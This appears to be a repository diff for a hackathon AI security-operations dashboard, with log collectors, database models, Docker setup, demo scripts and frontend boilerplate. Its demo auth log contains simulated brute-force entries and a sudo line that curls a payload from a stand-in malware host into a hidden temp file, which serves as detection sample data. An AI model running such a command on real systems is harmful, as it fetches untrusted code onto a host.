263
+
264
+
265
+ @app.get("/agent-activity")
266
+ async def agent_activity():
267
+ return {"items": list(hub.agent_log)[:200]}
268
+
269
+
270
+ @app.post("/replay/start")
271
+ async def replay_start(body: ReplayStartBody = ReplayStartBody()):
272
+ """Replay buffered threat_feed / detection / incident frames to all WebSocket clients."""
273
+ hub.schedule_replay(delay_ms=body.delay_ms)
274
+ return {"status": "scheduled", "delay_ms": body.delay_ms, "buffered": len(hub.replay_buffer)}
275
+
276
+
277
+ @app.get("/replay-buffer")
278
+ async def replay_buffer():
279
+ return {"count": len(hub.replay_buffer), "items": list(hub.replay_buffer)}
280
+
281
+
282
+ @app.get("/")
283
+ async def root():
284
+ """Landing hint — FastAPI did not define `/` before; browsers hitting only the host saw 404."""
285
+ return {
286
+ "service": "SentinelAI SOC API",
287
+ "docs": "/docs",
288
+ "health": "/health",
289
+ "openapi_json": "/openapi.json",
290
+ }
291
+
292
+
293
+ @app.get("/health")
294
+ async def health():
295
+ return {"status": "ok", "service": "sentinelai"}
296
+
297
+
298
+ @app.get("/workflow-state")
299
+ async def workflow_state(pipeline: PipelineDep) -> WorkflowState:
300
+ return WorkflowState(
301
+ events=pipeline._events[-50:], # noqa: SLF001
302
+ findings=pipeline._findings[-100:], # noqa: SLF001
303
+ incidents=pipeline._incidents[-20:], # noqa: SLF001
304
+ )
collectors/__init__.py ADDED
@@ -0,0 +1 @@
 
 
1
+ """Log and telemetry collectors."""
collectors/collector_agent.py ADDED
@@ -0,0 +1,147 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """Autonomous collector agent: async directory tail + explicit Linux auth.log paths."""
2
+
3
+ from __future__ import annotations
4
+
5
+ import asyncio
6
+ import logging
7
+ import os
8
+ from pathlib import Path
9
+ from typing import Awaitable, Callable
10
+
11
+ from models.schemas import RawLogIngest
12
+
13
+ logger = logging.getLogger("sentinelai.collector")
14
+
15
+ EmitFn = Callable[[RawLogIngest], Awaitable[None]]
16
+
17
+
18
+ class CollectorAgent:
19
+ """Runs background collectors and pushes RawLogIngest to the pipeline."""
20
+
21
+ def __init__(self, emit: EmitFn) -> None:
22
+ self.emit = emit
23
+ self._tasks: list[asyncio.Task] = []
24
+ self._file_positions: dict[str, int] = {}
25
+
26
+ def start_all_tails(self) -> None:
27
+ """Watch demo directory plus optional explicit files (e.g. /var/log/auth.log)."""
28
+ self.start_file_tail()
29
+ extra: list[str] = []
30
+ raw_paths = os.getenv("COLLECTOR_FILE_PATHS", "")
31
+ extra.extend(p.strip() for p in raw_paths.split(",") if p.strip())
32
+ if os.getenv("COLLECT_AUTH_LOG", "").lower() in {"1", "true", "yes"}:
33
+ auth = os.getenv("AUTH_LOG_PATH", "/var/log/auth.log").strip()
34
+ if auth:
35
+ extra.append(auth)
36
+ else:
37
+ auth_only = os.getenv("AUTH_LOG_PATH", "").strip()
38
+ if auth_only:
39
+ extra.append(auth_only)
40
+ seen: set[str] = set()
41
+ for p in extra:
42
+ if p in seen:
43
+ continue
44
+ seen.add(p)
45
+ self._start_single_file_tail(Path(p))
46
+
47
+ def start_file_tail(self, watch_dir: str | None = None) -> None:
48
+ base = Path(watch_dir or os.getenv("COLLECTOR_WATCH_DIR", "./demo_logs"))
49
+ base.mkdir(parents=True, exist_ok=True)
50
+
51
+ async def tail_loop() -> None:
52
+ while True:
53
+ await self._drain_directory(base, source="file")
54
+ await asyncio.sleep(float(os.getenv("COLLECTOR_POLL_SEC", "1.0")))
55
+
56
+ self._tasks.append(asyncio.create_task(tail_loop()))
57
+ logger.info("Async file collector tailing directory %s", base)
58
+
59
+ def _start_single_file_tail(self, path: Path) -> None:
60
+ async def tail_one() -> None:
61
+ warned = False
62
+ while True:
63
+ if not path.is_file():
64
+ if not warned:
65
+ logger.warning("Collector waiting for file %s (missing or not readable yet)", path)
66
+ warned = True
67
+ await asyncio.sleep(float(os.getenv("COLLECTOR_MISSING_RETRY_SEC", "10")))
68
+ continue
69
+ warned = False
70
+ key = str(path.resolve())
71
+ try:
72
+ with path.open("r", encoding="utf-8", errors="ignore") as f:
73
+ f.seek(self._file_positions.get(key, 0))
74
+ for line in f:
75
+ line = line.strip()
76
+ if line:
77
+ await self.emit(
78
+ RawLogIngest(
79
+ source="linux_auth" if "auth.log" in path.name else "file",
80
+ raw_line=line,
81
+ metadata={"path": key, "host": os.getenv("COLLECTOR_HOSTNAME", "linux-host")},
82
+ )
83
+ )
84
+ self._file_positions[key] = f.tell()
85
+ except OSError as e:
86
+ logger.debug("tail skip %s: %s", path, e)
87
+ await asyncio.sleep(float(os.getenv("COLLECTOR_POLL_SEC", "1.0")))
88
+
89
+ self._tasks.append(asyncio.create_task(tail_one()))
90
+ logger.info("Async file collector tailing file %s", path)
91
+
92
+ async def _drain_directory(self, base: Path, source: str) -> None:
93
+ for path in sorted(base.rglob("*")):
94
+ if not path.is_file():
95
+ continue
96
+ if path.suffix not in {".log", ".txt", ""}:
97
+ continue
98
+ key = str(path)
99
+ try:
100
+ with path.open("r", encoding="utf-8", errors="ignore") as f:
101
+ f.seek(self._file_positions.get(key, 0))
102
+ for line in f:
103
+ line = line.strip()
104
+ if line:
105
+ await self.emit(
106
+ RawLogIngest(
107
+ source=source,
108
+ raw_line=line,
109
+ metadata={"path": key, "host": os.getenv("COLLECTOR_HOSTNAME", "edge-01")},
110
+ )
111
+ )
112
+ self._file_positions[key] = f.tell()
113
+ except OSError as e:
114
+ logger.debug("tail skip %s: %s", path, e)
115
+
116
+ def stop(self) -> None:
117
+ for t in self._tasks:
118
+ t.cancel()
119
+
120
+ def start_mock_cloud_poll(self) -> None:
121
+ async def poll() -> None:
122
+ while True:
123
+ await asyncio.sleep(30)
124
+ await self.emit(
125
+ RawLogIngest(
126
+ source="cloudtrail_mock",
127
+ raw_line='{"event_type":"api.unusual","source_ip":"203.0.113.50","host":"aws","severity":"medium","message":"AssumeRole spike"}',
128
+ metadata={"host": "aws-control-plane"},
129
+ )
130
+ )
131
+
132
+ self._tasks.append(asyncio.create_task(poll()))
133
+
134
+ async def docker_stream_sample(self) -> None:
135
+ try:
136
+ import docker # type: ignore
137
+ except ImportError:
138
+ return
139
+ client = docker.from_env()
140
+ for c in client.containers.list()[:3]:
141
+ try:
142
+ for line in c.logs(stream=False, tail=5).decode(errors="ignore").splitlines():
143
+ await self.emit(
144
+ RawLogIngest(source="docker", raw_line=line, metadata={"container": c.short_id})
145
+ )
146
+ except Exception as e: # noqa: BLE001
147
+ logger.debug("docker log: %s", e)
components/.gitkeep ADDED
File without changes
database/__init__.py ADDED
@@ -0,0 +1 @@
 
 
1
+ """Persistence layer."""
database/models.py ADDED
@@ -0,0 +1,61 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """SQLAlchemy ORM models for PostgreSQL."""
2
+
3
+ from __future__ import annotations
4
+
5
+ import uuid
6
+ from datetime import datetime, timezone
7
+
8
+ from sqlalchemy import JSON, DateTime, Float, Integer, String, Text
9
+ from sqlalchemy.dialects.postgresql import UUID
10
+ from sqlalchemy.orm import DeclarativeBase, Mapped, mapped_column
11
+
12
+
13
+ class Base(DeclarativeBase):
14
+ pass
15
+
16
+
17
+ class EventRecord(Base):
18
+ __tablename__ = "events"
19
+
20
+ id: Mapped[uuid.UUID] = mapped_column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
21
+ timestamp: Mapped[datetime] = mapped_column(DateTime(timezone=True))
22
+ event_type: Mapped[str] = mapped_column(String(128))
23
+ source_ip: Mapped[str | None] = mapped_column(String(64), nullable=True)
24
+ host: Mapped[str] = mapped_column(String(256), default="unknown")
25
+ severity: Mapped[str] = mapped_column(String(32))
26
+ payload: Mapped[dict] = mapped_column(JSON, default=dict)
27
+ created_at: Mapped[datetime] = mapped_column(DateTime(timezone=True), default=lambda: datetime.now(timezone.utc))
28
+
29
+
30
+ class IncidentRecord(Base):
31
+ __tablename__ = "incidents"
32
+
33
+ id: Mapped[uuid.UUID] = mapped_column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
34
+ title: Mapped[str] = mapped_column(String(512))
35
+ summary: Mapped[str] = mapped_column(Text)
36
+ graph: Mapped[dict] = mapped_column(JSON, default=dict)
37
+ risk_score: Mapped[float] = mapped_column(Float, default=0)
38
+ severity: Mapped[str] = mapped_column(String(32))
39
+ created_at: Mapped[datetime] = mapped_column(DateTime(timezone=True), default=lambda: datetime.now(timezone.utc))
40
+
41
+
42
+ class AlertRecord(Base):
43
+ __tablename__ = "alerts"
44
+
45
+ id: Mapped[uuid.UUID] = mapped_column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
46
+ channel: Mapped[str] = mapped_column(String(64))
47
+ title: Mapped[str] = mapped_column(String(512))
48
+ body: Mapped[str] = mapped_column(Text)
49
+ severity: Mapped[str] = mapped_column(String(32))
50
+ incident_id: Mapped[uuid.UUID | None] = mapped_column(UUID(as_uuid=True), nullable=True)
51
+ created_at: Mapped[datetime] = mapped_column(DateTime(timezone=True), default=lambda: datetime.now(timezone.utc))
52
+
53
+
54
+ class MetricSnapshot(Base):
55
+ __tablename__ = "metric_snapshots"
56
+
57
+ id: Mapped[int] = mapped_column(Integer, primary_key=True, autoincrement=True)
58
+ threats_detected: Mapped[int] = mapped_column(Integer, default=0)
59
+ active_incidents: Mapped[int] = mapped_column(Integer, default=0)
60
+ blocked: Mapped[int] = mapped_column(Integer, default=0)
61
+ recorded_at: Mapped[datetime] = mapped_column(DateTime(timezone=True), default=lambda: datetime.now(timezone.utc))
database/session.py ADDED
@@ -0,0 +1,35 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """Async database session factory."""
2
+
3
+ from __future__ import annotations
4
+
5
+ import os
6
+
7
+ from sqlalchemy.ext.asyncio import AsyncSession, async_sessionmaker, create_async_engine
8
+ from sqlalchemy.pool import NullPool
9
+
10
+ from database.models import Base
11
+
12
+ DATABASE_URL = os.getenv(
13
+ "DATABASE_URL",
14
+ "postgresql+asyncpg://sentinel:sentinel@localhost:5432/sentinelai",
15
+ )
16
+
17
+ _connect_args: dict = {}
18
+ if "postgresql" in DATABASE_URL and "asyncpg" in DATABASE_URL:
19
+ _connect_args["timeout"] = float(os.getenv("DB_CONNECT_TIMEOUT_SEC", "10"))
20
+
21
+ engine = create_async_engine(
22
+ DATABASE_URL,
23
+ echo=False,
24
+ poolclass=NullPool,
25
+ connect_args=_connect_args or {},
26
+ )
27
+
28
+ async_session_factory = async_sessionmaker(engine, class_=AsyncSession, expire_on_commit=False)
29
+
30
+
31
+ async def init_db() -> None:
32
+ if os.getenv("SKIP_DB", "").lower() in {"1", "true", "yes"}:
33
+ return
34
+ async with engine.begin() as conn:
35
+ await conn.run_sync(Base.metadata.create_all)
demo_logs/auth_demo.log ADDED
@@ -0,0 +1,7 @@
 
 
 
 
 
 
 
 
1
+ Jan 10 10:01:02 edge-01 sshd[1200]: Failed password for invalid user admin from 185.220.101.1 port 22 ssh2
2
+ Jan 10 10:01:05 edge-01 sshd[1201]: Failed password for invalid user admin from 185.220.101.1 port 22 ssh2
3
+ Jan 10 10:01:08 edge-01 sshd[1202]: Failed password for invalid user admin from 185.220.101.1 port 22 ssh2
4
+ Jan 10 10:01:11 edge-01 sshd[1203]: Failed password for invalid user admin from 185.220.101.1 port 22 ssh2
5
+ Jan 10 10:01:14 edge-01 sshd[1204]: Failed password for invalid user admin from 185.220.101.1 port 22 ssh2
6
+ Jan 10 10:01:20 edge-01 sshd[1205]: Accepted publickey for ubuntu from 185.220.101.1 port 22 ssh2
7
+ Jan 10 10:01:45 edge-01 sudo: ubuntu : TTY=pts/0 ; USER=root ; COMMAND=/usr/bin/curl -fsSL http://malware.test/payload -o /tmp/.cache
docker/Dockerfile.backend ADDED
@@ -0,0 +1,21 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # SentinelAI control plane — use ROCm-enabled hosts for GPU inference (see README).
2
+ FROM python:3.12-slim
3
+
4
+ ENV PYTHONDONTWRITEBYTECODE=1 \
5
+ PYTHONUNBUFFERED=1 \
6
+ PYTHONPATH=/app
7
+
8
+ WORKDIR /app
9
+
10
+ RUN apt-get update && apt-get install -y --no-install-recommends \
11
+ build-essential \
12
+ libpq-dev \
13
+ && rm -rf /var/lib/apt/lists/*
14
+
15
+ COPY requirements.txt /app/requirements.txt
16
+ RUN pip install --no-cache-dir -r /app/requirements.txt
17
+
18
+ COPY . /app
19
+
20
+ EXPOSE 8000
21
+ CMD ["uvicorn", "backend.app.main:app", "--host", "0.0.0.0", "--port", "8000"]
docker/Dockerfile.frontend ADDED
@@ -0,0 +1,22 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ FROM node:22-alpine AS deps
2
+ WORKDIR /app
3
+ COPY frontend/package.json frontend/package-lock.json ./
4
+ RUN npm ci
5
+
6
+ FROM node:22-alpine AS builder
7
+ WORKDIR /app
8
+ COPY --from=deps /app/node_modules ./node_modules
9
+ COPY frontend ./
10
+ ENV NEXT_TELEMETRY_DISABLED=1
11
+ RUN npm run build
12
+
13
+ FROM node:22-alpine AS runner
14
+ WORKDIR /app
15
+ ENV NODE_ENV=production
16
+ ENV NEXT_TELEMETRY_DISABLED=1
17
+ COPY --from=builder /app/.next ./.next
18
+ COPY --from=builder /app/public ./public
19
+ COPY --from=builder /app/package.json ./
20
+ COPY --from=builder /app/node_modules ./node_modules
21
+ EXPOSE 3000
22
+ CMD ["npm", "run", "start", "--", "-H", "0.0.0.0", "-p", "3000"]
docker/docker-compose.yml ADDED
@@ -0,0 +1,69 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ services:
2
+ postgres:
3
+ image: postgres:16-alpine
4
+ environment:
5
+ POSTGRES_USER: sentinel
6
+ POSTGRES_PASSWORD: sentinel
7
+ POSTGRES_DB: sentinelai
8
+ ports:
9
+ - "5432:5432"
10
+ volumes:
11
+ - pgdata:/var/lib/postgresql/data
12
+ healthcheck:
13
+ test: ["CMD-SHELL", "pg_isready -U sentinel -d sentinelai"]
14
+ interval: 5s
15
+ timeout: 5s
16
+ retries: 10
17
+
18
+ redis:
19
+ image: redis:7-alpine
20
+ ports:
21
+ - "6379:6379"
22
+
23
+ backend:
24
+ build:
25
+ context: ..
26
+ dockerfile: docker/Dockerfile.backend
27
+ environment:
28
+ DATABASE_URL: postgresql+asyncpg://sentinel:sentinel@postgres:5432/sentinelai
29
+ REDIS_URL: redis://redis:6379/0
30
+ CORS_ORIGINS: http://localhost:3000
31
+ COLLECTOR_WATCH_DIR: /app/demo_logs
32
+ OLLAMA_HOST: http://ollama:11434
33
+ ENABLE_MOCK_CLOUD_POLL: "1"
34
+ ports:
35
+ - "8000:8000"
36
+ depends_on:
37
+ postgres:
38
+ condition: service_healthy
39
+ redis:
40
+ condition: service_started
41
+ volumes:
42
+ - ../demo_logs:/app/demo_logs
43
+
44
+ frontend:
45
+ build:
46
+ context: ..
47
+ dockerfile: docker/Dockerfile.frontend
48
+ environment:
49
+ NEXT_PUBLIC_API_URL: http://localhost:8000
50
+ ports:
51
+ - "3000:3000"
52
+ depends_on:
53
+ - backend
54
+
55
+ # Optional: attach AMD ROCm Ollama for local Llama 3 / Qwen / Mistral inference.
56
+ # Use a ROCm-tagged Ollama image on Linux hosts with AMD GPUs.
57
+ # ollama:
58
+ # image: ollama/ollama:rocm
59
+ # devices:
60
+ # - /dev/kfd
61
+ # - /dev/dri
62
+ # ports:
63
+ # - "11434:11434"
64
+ # volumes:
65
+ # - ollama:/root/.ollama
66
+
67
+ volumes:
68
+ pgdata: {}
69
+ # ollama: {}
docs/DEMO_SCRIPT.md ADDED
@@ -0,0 +1,52 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # SentinelAI — Judge Demo Script (do not improvise)
2
+
3
+ ## Preconditions (2 minutes before)
4
+
5
+ 1. Terminal A — API:
6
+ `cd SentinelAI && source .venv/bin/activate && export PYTHONPATH=$PWD && export SKIP_DB=1`
7
+ `uvicorn backend.app.main:app --host 0.0.0.0 --port 8000`
8
+ 2. Terminal B — UI:
9
+ `cd SentinelAI/frontend && NEXT_PUBLIC_API_URL=http://127.0.0.1:8000 npm run dev`
10
+ 3. Open dashboard at `http://localhost:3000` (or your dev URL).
11
+
12
+ ## The flow (≈3–4 minutes)
13
+
14
+ 1. **Start continuous simulation**
15
+ Terminal C: `python scripts/continuous_demo.py`
16
+ Say: *“This is autonomous traffic — no manual log upload.”*
17
+
18
+ 2. **Live stream**
19
+ Point at **Live Threat Feed** and **terminal strip**.
20
+ Say: *“Collector → parser → enrichment → detection — everything is event-driven.”*
21
+
22
+ 3. **Threat detected**
23
+ When **detection** rows appear with severity, say: *“Rules + sliding windows — brute-force and post-auth patterns.”*
24
+
25
+ 4. **Incident chain**
26
+ Point at **Attack Timeline** when an incident appears.
27
+ Say: *“Correlation fuses events by source into one narrative.”*
28
+
29
+ 5. **AI investigation**
30
+ Wait for **AI Investigation** to populate (auto-runs after an incident; may take up to ~`AUTO_AI_MIN_SEC` between runs).
31
+ Say: *“Analyst layer — progression, severity rationale, remediation bullets — local Llama/Qwen on AMD ROCm when configured.”*
32
+
33
+ 6. **WOW — Replay**
34
+ Click **Replay last chain**.
35
+ Say: *“We’re re-streaming the buffered kill chain for the jury — same detections and AI report, cinematic replay.”*
36
+
37
+ 7. **Remediation**
38
+ Scroll AI panel for **Recommended actions** (or call `POST /remediation` with `incident_id` if you show API).
39
+ Say: *“Playbooks block IOCs, rotate creds, harden IAM.”*
40
+
41
+ 8. **AMD story**
42
+ Point at **Powered by AMD ROCm** panel (GPU %, latency, concurrent agents are demo-swayed metrics).
43
+ Say: *“Open weights, on-prem, parallel agents — ROCm is our inference path for SOC-scale throughput.”*
44
+
45
+ ## Optional soak test (10–15 minutes)
46
+
47
+ - Leave `continuous_demo.py` running; confirm API stays up, WebSocket shows heartbeats, UI stays responsive.
48
+ - If the LLM is down, narratives still read well — **cinematic fallback** is always on.
49
+
50
+ ## Backup
51
+
52
+ - If live demo fails: use your **screen recording** (see `docs/RECORDING_CHECKLIST.md`).
docs/PITCH.md ADDED
@@ -0,0 +1,28 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # SentinelAI — One-line positioning
2
+
3
+ **Do not say:** “AI cybersecurity dashboard.”
4
+
5
+ **Do say:**
6
+
7
+ > SentinelAI is an **autonomous multi-agent AI Security Operations Center** that continuously monitors infrastructure, correlates attacks, performs **AI-driven investigations**, and generates **remediation workflows** using **AMD-accelerated open-source AI** infrastructure.
8
+
9
+ ## 30-second version
10
+
11
+ - **Autonomous collectors** tail auth and demo logs (extend to Docker/K8s/cloud).
12
+ - **Detection** — brute-force, privilege abuse, malicious-source hits.
13
+ - **Correlation** — timelines and graphs, not isolated alerts.
14
+ - **AI analyst** — enterprise narratives, severity reasoning, action list (Ollama / vLLM / ROCm).
15
+ - **Command deck** — live feed, replay, ROCm panel, agent activity.
16
+
17
+ ## Why judges care
18
+
19
+ | Angle | Hook |
20
+ |--------|------|
21
+ | **Autonomy** | Runs without chat prompts; event pipeline drives agents. |
22
+ | **Multi-agent** | Collectors, detection, correlation, analyst, remediation, alerts. |
23
+ | **Data residency** | Local open models — no mandatory third-party LLM API. |
24
+ | **AMD** | ROCm = throughput for concurrent SOC reasoning at hackathon cost. |
25
+
26
+ ## Closing
27
+
28
+ “We’re not a chatbot bolted onto logs — we’re a **mini-SOC runtime** you can demo in minutes and extend to real auth.log and TI feeds.”
docs/RECORDING_CHECKLIST.md ADDED
@@ -0,0 +1,26 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # Backup demo video — recording checklist
2
+
3
+ Record **even if** the live pitch will be live. Judges forgive a short clip if Wi‑Fi dies.
4
+
5
+ ## Capture (3–5 minutes total)
6
+
7
+ - [ ] Terminal: `uvicorn` + `continuous_demo.py` visible or mentioned.
8
+ - [ ] Browser: **Live Threat Feed** scrolling with detections.
9
+ - [ ] **Attack Timeline** with at least one incident.
10
+ - [ ] **AI Investigation** filled (narrative + recommended actions).
11
+ - [ ] Click **Replay last chain** — show replay badges on rows.
12
+ - [ ] Pan to **Powered by AMD ROCm** panel.
13
+ - [ ] Optional: quick flash of `POST /ingest-logs` or OpenAPI `/docs`.
14
+
15
+ ## Technical tips
16
+
17
+ - **Resolution:** 1920×1080, 30fps minimum.
18
+ - **Audio:** short voiceover OR captions (OBS / QuickTime + captions in post).
19
+ - **No secrets:** blur `.env`, webhooks, API keys if shown.
20
+ - **File name:** `SentinelAI-demo-backup-YYYY-MM-DD.mp4`
21
+
22
+ ## Where to use it
23
+
24
+ - Submission “demo video” field
25
+ - Slide deck embed
26
+ - Social / portfolio clip
frontend/.gitignore ADDED
@@ -0,0 +1,41 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # See https://help.github.com/articles/ignoring-files/ for more about ignoring files.
2
+
3
+ # dependencies
4
+ /node_modules
5
+ /.pnp
6
+ .pnp.*
7
+ .yarn/*
8
+ !.yarn/patches
9
+ !.yarn/plugins
10
+ !.yarn/releases
11
+ !.yarn/versions
12
+
13
+ # testing
14
+ /coverage
15
+
16
+ # next.js
17
+ /.next/
18
+ /out/
19
+
20
+ # production
21
+ /build
22
+
23
+ # misc
24
+ .DS_Store
25
+ *.pem
26
+
27
+ # debug
28
+ npm-debug.log*
29
+ yarn-debug.log*
30
+ yarn-error.log*
31
+ .pnpm-debug.log*
32
+
33
+ # env files (can opt-in for committing if needed)
34
+ .env*
35
+
36
+ # vercel
37
+ .vercel
38
+
39
+ # typescript
40
+ *.tsbuildinfo
41
+ next-env.d.ts
frontend/.nvmrc ADDED
@@ -0,0 +1 @@
 
 
1
+ 22
frontend/README.md ADDED
@@ -0,0 +1,36 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ This is a [Next.js](https://nextjs.org) project bootstrapped with [`create-next-app`](https://nextjs.org/docs/app/api-reference/cli/create-next-app).
2
+
3
+ ## Getting Started
4
+
5
+ First, run the development server:
6
+
7
+ ```bash
8
+ npm run dev
9
+ # or
10
+ yarn dev
11
+ # or
12
+ pnpm dev
13
+ # or
14
+ bun dev
15
+ ```
16
+
17
+ Open [http://localhost:3000](http://localhost:3000) with your browser to see the result.
18
+
19
+ You can start editing the page by modifying `app/page.tsx`. The page auto-updates as you edit the file.
20
+
21
+ This project uses [`next/font`](https://nextjs.org/docs/app/building-your-application/optimizing/fonts) to automatically optimize and load [Geist](https://vercel.com/font), a new font family for Vercel.
22
+
23
+ ## Learn More
24
+
25
+ To learn more about Next.js, take a look at the following resources:
26
+
27
+ - [Next.js Documentation](https://nextjs.org/docs) - learn about Next.js features and API.
28
+ - [Learn Next.js](https://nextjs.org/learn) - an interactive Next.js tutorial.
29
+
30
+ You can check out [the Next.js GitHub repository](https://github.com/vercel/next.js) - your feedback and contributions are welcome!
31
+
32
+ ## Deploy on Vercel
33
+
34
+ The easiest way to deploy your Next.js app is to use the [Vercel Platform](https://vercel.com/new?utm_medium=default-template&filter=next.js&utm_source=create-next-app&utm_campaign=create-next-app-readme) from the creators of Next.js.
35
+
36
+ Check out our [Next.js deployment documentation](https://nextjs.org/docs/app/building-your-application/deploying) for more details.
frontend/components.json ADDED
@@ -0,0 +1,25 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "$schema": "https://ui.shadcn.com/schema.json",
3
+ "style": "base-nova",
4
+ "rsc": true,
5
+ "tsx": true,
6
+ "tailwind": {
7
+ "config": "",
8
+ "css": "src/app/globals.css",
9
+ "baseColor": "neutral",
10
+ "cssVariables": true,
11
+ "prefix": ""
12
+ },
13
+ "iconLibrary": "lucide",
14
+ "rtl": false,
15
+ "aliases": {
16
+ "components": "@/components",
17
+ "utils": "@/lib/utils",
18
+ "ui": "@/components/ui",
19
+ "lib": "@/lib",
20
+ "hooks": "@/hooks"
21
+ },
22
+ "menuColor": "default",
23
+ "menuAccent": "subtle",
24
+ "registries": {}
25
+ }
frontend/eslint.config.mjs ADDED
@@ -0,0 +1,25 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import { dirname } from "path";
2
+ import { fileURLToPath } from "url";
3
+ import { FlatCompat } from "@eslint/eslintrc";
4
+
5
+ const __filename = fileURLToPath(import.meta.url);
6
+ const __dirname = dirname(__filename);
7
+
8
+ const compat = new FlatCompat({
9
+ baseDirectory: __dirname,
10
+ });
11
+
12
+ const eslintConfig = [
13
+ ...compat.extends("next/core-web-vitals", "next/typescript"),
14
+ {
15
+ ignores: [
16
+ "node_modules/**",
17
+ ".next/**",
18
+ "out/**",
19
+ "build/**",
20
+ "next-env.d.ts",
21
+ ],
22
+ },
23
+ ];
24
+
25
+ export default eslintConfig;
frontend/next.config.ts ADDED
@@ -0,0 +1,13 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import type { NextConfig } from "next";
2
+ import path from "path";
3
+
4
+ const nextConfig: NextConfig = {
5
+ // Keeps output file tracing anchored to this app when multiple lockfiles exist on the machine.
6
+ outputFileTracingRoot: path.join(process.cwd()),
7
+ // ESLint 9 + eslint-config-next can throw "Components.detect is not a function" for react plugin; run `npm run lint` locally.
8
+ eslint: {
9
+ ignoreDuringBuilds: true,
10
+ },
11
+ };
12
+
13
+ export default nextConfig;
frontend/package-lock.json ADDED
The diff for this file is too large to render. See raw diff
 
frontend/package.json ADDED
@@ -0,0 +1,40 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "name": "frontend",
3
+ "version": "0.1.0",
4
+ "private": true,
5
+ "engines": {
6
+ "node": ">=20.0.0 <25.0.0"
7
+ },
8
+ "scripts": {
9
+ "dev": "next dev",
10
+ "dev:22": "bash ./run-dev.sh",
11
+ "build": "next build",
12
+ "start": "next start",
13
+ "lint": "eslint"
14
+ },
15
+ "dependencies": {
16
+ "@base-ui/react": "^1.4.1",
17
+ "class-variance-authority": "^0.7.1",
18
+ "clsx": "^2.1.1",
19
+ "framer-motion": "^12.38.0",
20
+ "lucide-react": "^1.14.0",
21
+ "next": "15.5.18",
22
+ "react": "19.1.0",
23
+ "react-dom": "19.1.0",
24
+ "recharts": "^3.8.1",
25
+ "shadcn": "^4.7.0",
26
+ "tailwind-merge": "^3.5.0",
27
+ "tw-animate-css": "^1.4.0"
28
+ },
29
+ "devDependencies": {
30
+ "@eslint/eslintrc": "^3",
31
+ "@tailwindcss/postcss": "^4",
32
+ "@types/node": "^20",
33
+ "@types/react": "^19",
34
+ "@types/react-dom": "^19",
35
+ "eslint": "^9",
36
+ "eslint-config-next": "15.5.18",
37
+ "tailwindcss": "^4",
38
+ "typescript": "^5"
39
+ }
40
+ }
frontend/postcss.config.mjs ADDED
@@ -0,0 +1,5 @@
 
 
 
 
 
 
1
+ const config = {
2
+ plugins: ["@tailwindcss/postcss"],
3
+ };
4
+
5
+ export default config;
frontend/public/file.svg ADDED
frontend/public/globe.svg ADDED
frontend/public/next.svg ADDED
frontend/public/vercel.svg ADDED
frontend/public/window.svg ADDED
frontend/run-dev.sh ADDED
@@ -0,0 +1,13 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env bash
2
+ # Next.js 15 + Node 24 breaks semver in `next dev`. Use Homebrew Node 22 for this project.
3
+ set -euo pipefail
4
+ cd "$(dirname "$0")"
5
+ for prefix in /opt/homebrew/opt/node@22 /usr/local/opt/node@22; do
6
+ if [[ -x "$prefix/bin/node" ]]; then
7
+ export PATH="$prefix/bin:$PATH"
8
+ break
9
+ fi
10
+ done
11
+ echo "Node: $(command -v node) ($(node -v))"
12
+ export NEXT_PUBLIC_API_URL="${NEXT_PUBLIC_API_URL:-http://127.0.0.1:8000}"
13
+ exec npm run dev
frontend/src/app/favicon.ico ADDED
frontend/src/app/globals.css ADDED
@@ -0,0 +1,182 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
